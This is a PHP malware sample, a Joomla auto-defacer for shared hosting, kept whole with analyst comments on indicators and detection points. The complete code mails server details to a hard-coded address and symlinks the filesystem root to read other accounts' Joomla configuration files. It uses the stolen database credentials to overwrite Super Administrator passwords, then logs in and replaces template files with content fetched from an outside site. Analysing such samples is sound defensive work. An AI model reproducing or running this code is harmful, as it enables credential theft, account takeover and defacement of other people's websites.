- <html>
- <?
- // ANALYSIS NOTE: malware sample (mass-defacement script aimed at shared hosting), kept
- // byte-for-byte for analysis. This opening section hides errors, removes the execution
- // time limit, reports the host to the author by e-mail and prepares a web-readable
- // symlink to the filesystem root.
- //joomla auto defacer
- //coded by ECF
- ini_set("display_errors", "0");
- set_time_limit(0);
- @session_start();
- echo "<p> <center> <font color=red font face='tahoma' size='6pt'>AUTOMATIC JOOMLA DEFACER </center></font> </p>";
- echo "<p> <center> <font color=green font face='tahoma' size='4pt'>CODED BY : ECF</center></font> </p>";
- echo "<p> <center> <font color=green font face='tahoma' size='4pt'>ECF</center></font> </p>";
- echo "<p> <center> <font color=green font face='tahoma' size='4pt'>http://blog.ecf.me</center></font> </p>";
- //mail feature
- // Beacon: the server IP, site name and this script's directory are mailed to a hard-coded
- // address, with the server IP as the subject. Unexpected mail() traffic from a web account
- // is a detection point.
- $body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
- mail('nadimzobaer@gmail.com',$_SERVER['SERVER_ADDR'],$body);
- $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
- //create symlink of / to /ecf/root/
- // Artifacts created in the script's directory: ecf/ (mode 0777), ecf/.htaccess and the
- // symlink ecf/root -> /. The .htaccess maps .php and .html to text/plain and lifts access
- // restrictions, so files reached through ecf/root come back as source text.
- // NOTE(review): this presumably only works where the server lets .htaccess set Options and
- // handlers and follows symlinks to files owned by other accounts; confirm against the host
- // configuration (e.g. SymLinksIfOwnerMatch, AllowOverride).
- @mkdir('ecf',0777);
- $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $fp = @fopen ('ecf/.htaccess','w');
- fwrite($fp, $wr);
- @symlink('/','ecf/root');
- //collecting site names
- // Enumeration stage. Reads the directory index of /var/named through the ecf/root symlink
- // over HTTP; each entry has its ".db" suffix removed and is appended to sites.txt as a
- // domain name.
- $text=file_get_contents($base_url.'/ecf/root/var/named/');
- $ar = explode('<li><a href="', $text);
- for($vi=2;$vi < count($ar);$vi++)
- {
- $var1 = strtok($ar[$vi], " ");
- $var1 = substr($var1,0,-2);
- $old=('.db');
- $new=('');
- $sites = str_replace($old , $new , $var1);
- $filename = 'sites.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $sites."\n");
- fclose($fp);
- }
- //collecting domainuser names for sites
- // Runs "ls -la /etc/valiases/<domain>" through exec() for every collected name and appends
- // the returned listing line to lsla.txt. Web-server processes spawning "ls" against
- // /etc/valiases are a detection point.
- $domainusers=file('sites.txt');
- foreach ($domainusers as $domainuser) {
- $textexec=("ls -la /etc/valiases/".$domainuser);
- $exec=exec($textexec);
- $filename = 'lsla.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $exec."\n");
- fclose($fp);
- }
- //creating final domain and domain user list
- // entre2v2() cuts the text between "-rw-r----- 1 " and " mail" out of each listing line and
- // uses it as the owning account; the part after /etc/valiases/ is the site. The pairs are
- // written to bhung.txt as user:site, separated by spaces.
- $lsla=file('lsla.txt');
- foreach ($lsla as $finaldom) {
- $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
- $site=substr(strstr($finaldom, '/etc/valiases'),14);
- $filename = 'bhung.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $user.":". $site." ");
- fclose($fp);
- }
- // Entries shorter than 6 characters go to faltu.txt (deleted below); the rest are written
- // to gold.txt, one user:site pair per line.
- $f=file_get_contents('bhung.txt');
- $finals=explode(" ",$f);
- foreach ($finals as $final){
- $strlen=('6');
- $dr=strlen ($final);
- if ($dr < $strlen) {
- $filename = 'faltu.txt';
- $fp = fopen($filename, "a");
- $write = fputs($fp, $final);
- fclose($fp);
- }
- else {
- $filename = 'gold.txt';
- $fp = fopen($filename, "a");
- $write = fputs($fp, $final."\n");
- fclose($fp);
- }
- }
- //delete the intermediate text files ("ajaira": presumably slang for junk)
- unlink ('bhung.txt');
- unlink ('faltu.txt');
- unlink ('lsla.txt');
- unlink ('sites.txt');
- // gold.txt is not removed here, so it stays on disk in the script's directory.
- // Main loop. For every user:site pair in gold.txt it reads that account's Joomla
- // configuration.php through the symlink, uses the database credentials found there to
- // overwrite the Super Administrator login, then signs in to /administrator and replaces
- // the active template's index.php with the content held in $h.
- // Indicators visible in this section: passchanged.txt and deftemp.txt in the script's
- // directory, a cookie-jar path named by randomt(), a users row renamed to 'admin' carrying
- // the hard-coded hash:salt, and a modified templates/<name>/index.php.
- // NOTE(review): the chain depends on another account's configuration.php being readable
- // from this account; per-account file permissions or isolation on the host would
- // presumably break it. Verify on the affected server.
- $h=file_get_contents('http://blog.ecf.me');
- $url=($base_url);
- $a=file($base_url.'/gold.txt');
- echo ("<center><table border=1 cellspacing=1 cellpading=1>
- <tr> <th width=200>Domain User</th> <th width=250>Website Name</td><th width=100>CMS</td><th width=200>Status</td></tr>");
- foreach ($a as $final) {
- list($user, $site_url) = explode(":", $final);
- $site_urlto = substr($site_url, 0, -1);
- // configuration.php is fetched as plain text via ecf/root; every '$' is replaced with 'ecf'
- // so the credential assignments can be cut out with entre2v2().
- $url2=($url."/ecf/root/home/".$user."/public_html/configuration.php");
- $configs=file_get_contents($url2);
- $old=('$');
- $new=('ecf');
- $configfile = str_replace($old , $new , $configs);
- $username=entre2v2($configfile, "ecfuser = '","';");
- $password=entre2v2($configfile, "ecfpassword = '","';");
- $dbname=entre2v2($configfile, "ecfdb = '","';");
- $dbprefix=entre2v2($configfile, "ecfdbprefix = '","';");
- // Continues only when a table prefix longer than 2 characters was extracted.
- $strlendbprefix= strlen ($dbprefix);
- if ($strlendbprefix > 2) {
- $link=mysql_connect("localhost",$username,$password) ;
- mysql_select_db($dbname,$link) ;
- // Rewrites the Super Administrator account directly in the database: the username becomes
- // 'admin' and the password field is set to a hard-coded hash:salt value.
- $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J' where usertype='Super Administrator'");
- //checking pass change
- $reqpass=('44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J');
- $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='admin'");
- $showpass=mysql_fetch_array ($checkpass);
- if ($showpass[0]== $reqpass) {
- $filename = 'passchanged.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $site_url."\n");
- fclose($fp);
- //upto this alright
- // Probes for an `extensions` table to choose between two request layouts for the
- // administrator pages (NOTE(review): presumably newer vs. older Joomla schemas; confirm).
- $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
- $co=randomt();
- if ( $req )
- {
- $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
- $data = mysql_fetch_array($req);
- $template_id=$data["extension_id"];
- // Request 1: GET the administrator login form and extract the hidden "return" value and a
- // hidden field name (presumably the form token).
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
- $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
- ///////////////////////////
- // Request 2: POST the login as 'admin' with passwd=1 (presumably the plaintext behind the
- // hard-coded hash). In access logs this appears as a POST to /administrator/index.php.
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- // The login result is tested, but both branches are empty.
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- }
- else {
- }
- ///////////////////////////
- // Request 3: open the template source editor for index.php and read a hidden field name
- // from the returned form.
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
- if($hidden2) {
- }
- else {
- }
- // Request 4: POST $h as the new source of the template's index.php (task=source.save).
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- // Outcome is judged by whether the message element appears in the response; a status row
- // is printed and, on success, the template URL is appended to deftemp.txt.
- $pos = strpos($buffer,'<dd class="message message">');
- if($pos === false) {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
- }
- else {
- $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
- $filename = 'deftemp.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $deftempurl."\n");
- fclose($fp);
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
- }
- }
- else
- {
- // Fallback when the `extensions` query fails: the same four requests, using the
- // templates_menu table and the edit_source / save_source tasks.
- $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- }
- else {
- }
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
- if($hidden2) {
- }
- else {
- }
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,'<dd class="message message fade">');
- if($pos === false) {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
- }
- else {
- $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
- $filename = 'deftemp.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $deftempurl."\n");
- fclose($fp);
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
- }
- }
- //upto this alright
- }
- else {
- }
- }
- else {
- }
- }
- // Summary output: loads passchanged.txt and counts its lines (the count is not used again
- // in this listing), then prints links to the two result files the run leaves in the
- // script's directory, deftemp.txt and passchanged.txt.
- $cntpasschanged=file('passchanged.txt');
- $countpasschanged= count ($cntpasschanged);
- echo("<br>");
- $defacedurl=('<a href="deftemp.txt" target="_blank">View List of Defaced Site</a><br />');
- $passchangedurl=('<a href="passchanged.txt" target="_blank">View List of Password Changed site</a><br />');
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <td width=300><font color=green> $defacedurl</font></td><td width=300><font color=green> $passchangedurl </font></td></tr></table></center>";
- //declaring function entre2v2
- // Returns the trimmed text that lies between two markers.
- //   $text               string to search
- //   $marqueurDebutLien  start marker ("link start marker")
- //   $marqueurFinLien    end marker ("link end marker")
- //   $i                  which occurrence of the start marker to use (1 = first)
- // The text is split on the start marker, piece $i is split on the end marker and the
- // first part is returned. There is no check that piece $i exists.
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- // Builds an 8-character string from $chars, seeded from microtime(). The main script
- // passes the result to CURLOPT_COOKIEJAR / CURLOPT_COOKIEFILE, so it is the name of the
- // cookie file. rand() % 33 yields indexes 0..32, so the final character of $chars is
- // never picked: names consist of a-k, m-z, 0 and 2-8 only, which is usable as a search
- // pattern for leftover files.
- function randomt() {
- $chars = "abcdefghijkmnopqrstuvwxyz023456789";
- srand((double)microtime()*1000000);
- $i = 0;
- $pass = '' ;
- // Loop runs for $i = 0..7, i.e. eight characters.
- while ($i <= 7) {
- $num = rand() % 33;
- $tmp = substr($chars, $num, 1);
- $pass = $pass . $tmp;
- $i++;
- }
- return $pass;
- }
- ?>